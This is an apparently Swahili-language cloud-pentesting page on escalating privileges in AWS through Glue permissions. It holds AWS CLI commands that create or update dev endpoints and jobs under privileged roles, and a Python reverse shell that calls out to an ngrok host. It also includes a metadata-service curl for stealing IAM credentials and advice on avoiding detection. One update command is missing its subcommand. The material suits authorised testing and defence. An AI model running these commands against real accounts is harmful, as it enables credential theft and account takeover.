glue

iam:PassRole, glue:CreateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

Watumiaji wenye ruhusa hizi wanaweza kuweka mwisho mpya wa maendeleo wa AWS Glue, kumtambulisha jukumu la huduma lililopo linaloweza kutekelezwa na Glue lenye ruhusa maalum kwa mwisho huu.

Baada ya usanidi, mshambuliaji anaweza kuingia kwa SSH kwenye kifaa cha mwisho, na kuiba siri za IAM za jukumu lililoteuliwa:

# Create endpoint
aws glue create-dev-endpoint --endpoint-name <endpoint-name> \
--role-arn <arn-role> \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com

Kwa lengo la kusalia bila kugundulika, inapendekezwa kutumia sifa za IAM kutoka ndani ya mashine halisi ya Glue.

Matokeo Yanayowezekana: Privesc kwa jukumu la huduma ya glue lililoelezwa.

glue:UpdateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

Watumiaji wenye idhini hii wanaweza kubadilisha ufunguo wa SSH wa kiendelezi cha Glue kilichopo, kuruhusu ufikiaji wa SSH kwake. Hii inaruhusu mshambuliaji kutekeleza amri kwa mamlaka ya jukumu lililounganishwa na kiendelezi:

# Change public key to connect
aws glue --endpoint-name target_endpoint \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com

Athari Inayowezekana: Privesc kwa jukumu la huduma ya glue iliyotumiwa.

iam:PassRole, (glue:CreateJob | glue:UpdateJob), (glue:StartJobRun | glue:CreateTrigger)

Watumiaji wenye iam:PassRole pamoja na glue:CreateJob au glue:UpdateJob, na pia glue:StartJobRun au glue:CreateTrigger wanaweza kuunda au kusasisha kazi ya AWS Glue, kuambatisha akaunti yoyote ya huduma ya Glue, na kuanzisha utekelezaji wa kazi. Uwezo wa kazi ni pamoja na kukimbia nambari ya Python isiyo na kikomo, ambayo inaweza kutumiwa kuanzisha kabati la nyuma. Kabati hili la nyuma linaweza kutumika kuchukua vyeti vya IAM vya jukumu lililoambatishwa kwenye kazi ya Glue, ikisababisha ufikiaji usioruhusiwa au hatua kulingana na ruhusa za jukumu hilo:

# Content of the python script saved in s3:
#import socket,subprocess,os
#s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#s.connect(("2.tcp.ngrok.io",11216))
#os.dup2(s.fileno(),0)
#os.dup2(s.fileno(),1)
#os.dup2(s.fileno(),2)
#p=subprocess.call(["/bin/sh","-i"])
#To get the IAM Role creds run: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy


# A Glue role with admin access was created
aws glue create-job \
--name privesctest \
--role arn:aws:iam::93424712358:role/GlueAdmin \
--command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}'

# You can directly start the job
aws glue start-job-run --job-name privesctest
# Or you can create a trigger to start it
aws glue create-trigger --name triggerprivesc --type SCHEDULED \
--actions '[{"JobName": "privesctest"}]' --start-on-creation \
--schedule "0/5 * * * * *"  #Every 5mins, feel free to change

Athari Inayowezekana: Privesc kwa jukumu la huduma ya glue lililoelezwa.

glue:UpdateJob

Kwa idhini ya kuboresha pekee, mshambuliaji anaweza kuiba Sifa za IAM za jukumu lililounganishwa tayari.

Athari Inayowezekana: Privesc kwa jukumu la huduma ya glue lililounganishwa.

Marejeo

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/